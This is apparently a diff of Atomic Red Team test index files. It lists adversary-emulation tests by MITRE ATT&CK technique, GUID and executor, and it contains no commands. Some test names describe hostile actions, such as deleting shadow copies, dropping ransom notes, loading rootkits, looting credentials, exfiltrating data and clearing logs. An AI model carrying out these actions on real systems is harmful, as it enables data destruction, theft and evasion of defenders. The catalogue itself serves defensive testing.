1488 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
1489 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
1490 discovery T1057 Process Discovery 6 Discover Specific Process - tasklist 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb command_prompt
1491 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
1492 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
1493 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
1494 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
1495 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
1496 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
1497 discovery T1069.001 Permission Groups Discovery: Local Groups 7 Permission Groups Discovery for Containers- Local Groups 007d7aa4-8c4d-4f55-ba6a-7c965d51219c sh
1498 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
1499 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
1500 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
1501 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
1502 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
1503 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
1504 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
1505 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
1506 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
1507 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
1508 discovery T1201 Password Policy Discovery 11 Examine AWS Password Policy 15330820-d405-450b-bd08-16b5be5be9f4 sh
1509 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
1510 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1511 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
1512 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
1513 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
1514 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
1515 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1516 discovery T1012 Query Registry 2 Query Registry with Powershell cmdlets 0434d081-bb32-42ce-bcbb-3548e4f2628f powershell
1517 discovery T1012 Query Registry 3 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1518 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
1519 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
1520 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
1521 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
1522 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
1523 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
1524 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
1525 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1526 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1527 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
1528 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
1529 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
1530 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
1531 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
1532 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
1533 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
1534 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
1535 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
1536 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
1537 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
1538 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
1539 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
1540 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
1541 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
1542 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
1543 discovery T1018 Remote System Discovery 19 Get-WmiObject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
1544 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
1545 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
1546 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
1547 discovery T1046 Network Service Discovery 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
1548 discovery T1046 Network Service Discovery 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
1549 discovery T1046 Network Service Discovery 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
1550 discovery T1046 Network Service Discovery 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
1551 discovery T1046 Network Service Discovery 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
1552 discovery T1046 Network Service Discovery 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
1553 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
1554 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
1555 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
1556 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
1557 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
1558 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
1559 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
1560 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
1561 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1562 discovery T1124 System Time Discovery 3 System Time Discovery in macOS f449c933-0891-407f-821e-7916a21a1a6f sh
1563 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1564 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
1565 reconnaissance T1592.001 Gather Victim Host Information: Hardware 1 Enumerate PlugNPlay Camera d430bf85-b656-40e7-b238-42db01df0183 powershell
1566 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1567 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1568 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1569 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1570 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1571 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1572 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1573 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1574 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
1575 impact T1531 Account Access Removal 5 Delete User via dscl utility 4d938c43-2fe8-4d70-a5b3-5bf239aa7846 sh
1576 impact T1531 Account Access Removal 6 Delete User via sysadminctl utility d3812c4e-30ee-466a-a0aa-07e355b561d6 sh
1577 impact T1531 Account Access Removal 7 Azure AD - Delete user via Azure AD PowerShell 4f577511-dc1c-4045-bcb8-75d2457f01f4 powershell
1578 impact T1531 Account Access Removal 8 Azure AD - Delete user via Azure CLI c955c1c7-3145-4a22-af2d-63eea0d967f0 powershell
1579 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
1580 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
1581 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
1582 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
1583 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1584 impact T1486 Data Encrypted for Impact 6 Encrypt files using 7z utility - macOS 645f0f5a-ef09-48d8-b9bc-f0e24c642d72 sh
1585 impact T1486 Data Encrypted for Impact 7 Encrypt files using openssl utility - macOS 1a01f6b8-b1e8-418e-bbe3-78a6f822759e sh
1586 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1587 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
1588 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1589 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
1590 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1591 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1592 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1593 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1594 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1595 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1596 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1597 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1598 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1599 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1600 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1601 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1602 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
1603 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
1604 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
1605 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
1606 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
1607 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
1608 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
1609 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1610 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1611 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1612 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1613 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1614 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1615 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1616 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1617 initial-access T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
1618 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1619 initial-access T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
1620 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1621 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1622 initial-access T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
1623 initial-access T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
1624 initial-access T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
1625 initial-access T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1626 initial-access T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1627 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
1628 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
1629 initial-access T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
1630 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1631 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1632 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
1633 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1634 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
1635 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
1636 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1637 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1638 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
1639 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
1640 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1641 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
1642 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1643 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1644 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1645 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
1646 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
atomics/Indexes/Indexes-CSV/linux-index.csv
-331
View File
@@ -1,331 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
